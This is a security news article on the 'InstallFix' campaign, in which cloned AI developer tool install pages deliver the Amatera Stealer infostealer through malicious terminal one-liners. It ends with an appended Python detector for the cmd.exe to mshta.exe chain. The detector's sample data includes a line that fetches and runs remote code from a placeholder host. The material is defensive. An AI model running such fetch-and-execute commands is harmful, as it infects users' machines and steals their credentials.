"InstallFix" Campaign: Threat Actors Clone AI Development Sites to Distribute Infostealers via Malicious Commands
Threat actors use Google Ads and cloned sites for Claude Code to distribute infostealers via malicious terminal commands in the InstallFix campaign.
By: AXL Media
Published: Mar 10, 2026, 7:19 AM EDT
Source: The information in this article was sourced from SecurityWeek

The Rise of InstallFix: Exploiting the AI Developer Boom
As interest in AI-driven development tools surges, threat actors have launched a highly targeted campaign called "InstallFix" to compromise the systems of software engineers and data scientists. According to a report from Push Security, this campaign is a new variant of the "ClickFix" social engineering family. It specifically targets users looking for Anthropic’s Claude Code CLI and other popular utilities like Homebrew. By using malvertising on platforms like Google Ads, the attackers ensure their malicious clones appear as sponsored results at the top of search pages, effectively intercepting users before they reach official documentation.
Near-Perfect Clones and Malicious Installation One-Liners
The core of the InstallFix strategy lies in visual deception. The malicious websites are virtually indistinguishable from the legitimate versions, mirroring the design, typography, and layout of the original tool pages. The critical difference is found in the "install one-liner"—the command developers typically copy and paste into their terminals to set up software. Instead of pointing to a secure repository, the rogue command directs the user's terminal to an attacker-controlled server. This technique exploits the common developer habit of executing terminal commands from the web without thoroughly inspecting the embedded URLs.
Multi-Stage Execution: From Terminal to Amatera Stealer
Once a victim executes the malicious command, a multi-stage infection chain begins. The initial command triggers cmd.exe, which in turn spawns mshta.exe to retrieve and execute remote code. This process results in the deployment of information-stealing malware, most notably Amatera Stealer. Researchers observed identical binaries being executed across different cloned sites, indicating a centralized infrastructure. The attackers also abuse legitimate services like Cloudflare Pages, Squarespace, and Tencent EdgeOne to host their content, allowing the malicious traffic to blend seamlessly with normal web activity.
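Detection logic for the process chain described above, as an added example that is not part of the original article or the Push Security report: it scans constructed process-creation records (a tab-separated key=value format assumed for illustration) and flags mshta.exe launched by cmd.exe with a remote URL on its command line, then reports the hosts being fetched from.

```python
"""Flag the InstallFix-style chain (cmd.exe -> mshta.exe fetching remote code)
in process-creation telemetry. Added example; record format and sample lines
are constructed, not taken from the report."""
import re
from urllib.parse import urlparse

# Any http(s) URL embedded in a command line (constructed detection heuristic).
REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def parse_event(line):
    """Parse one tab-separated 'key=value' process-creation record."""
    fields = {}
    for part in line.rstrip("\n").split("\t"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def is_installfix_chain(event):
    """True when mshta.exe has cmd.exe as parent and a remote URL argument."""
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    if not image.endswith("\\mshta.exe") or not parent.endswith("\\cmd.exe"):
        return False
    return bool(REMOTE_URL.search(event.get("CommandLine", "")))


def remote_hosts(event):
    """Hosts referenced by URLs in the command line, for triage and blocking."""
    urls = REMOTE_URL.findall(event.get("CommandLine", ""))
    return sorted({urlparse(u).hostname for u in urls if urlparse(u).hostname})


def scan(lines):
    """Return (ProcessId, [hosts]) for every record matching the chain."""
    hits = []
    for line in lines:
        event = parse_event(line)
        if is_installfix_chain(event):
            hits.append((event.get("ProcessId"), remote_hosts(event)))
    return hits


# Constructed sample telemetry: one benign cmd.exe, one suspicious mshta.exe
# spawned by cmd.exe with a placeholder URL, one local-file mshta.exe launch.
SAMPLE_EVENTS = [
    "ProcessId=4120\tImage=C:\\Windows\\System32\\cmd.exe\tParentImage=C:\\Windows\\explorer.exe\tCommandLine=cmd.exe /c dir",
    "ProcessId=4188\tImage=C:\\Windows\\System32\\mshta.exe\tParentImage=C:\\Windows\\System32\\cmd.exe\tCommandLine=mshta.exe https://pages.example-placeholder.invalid/setup",
    "ProcessId=4201\tImage=C:\\Windows\\System32\\mshta.exe\tParentImage=C:\\Windows\\explorer.exe\tCommandLine=mshta.exe C:\\Users\\dev\\local.hta",
]

if __name__ == "__main__":
    for pid, hosts in scan(SAMPLE_EVENTS):
        print(f"suspicious mshta.exe chain: pid={pid} hosts={hosts}")
```

In a real deployment the same predicate maps directly onto Sysmon Event ID 1 or EDR process-creation fields (Image, ParentImage, CommandLine), so the logic can be ported to a SIEM rule unchanged.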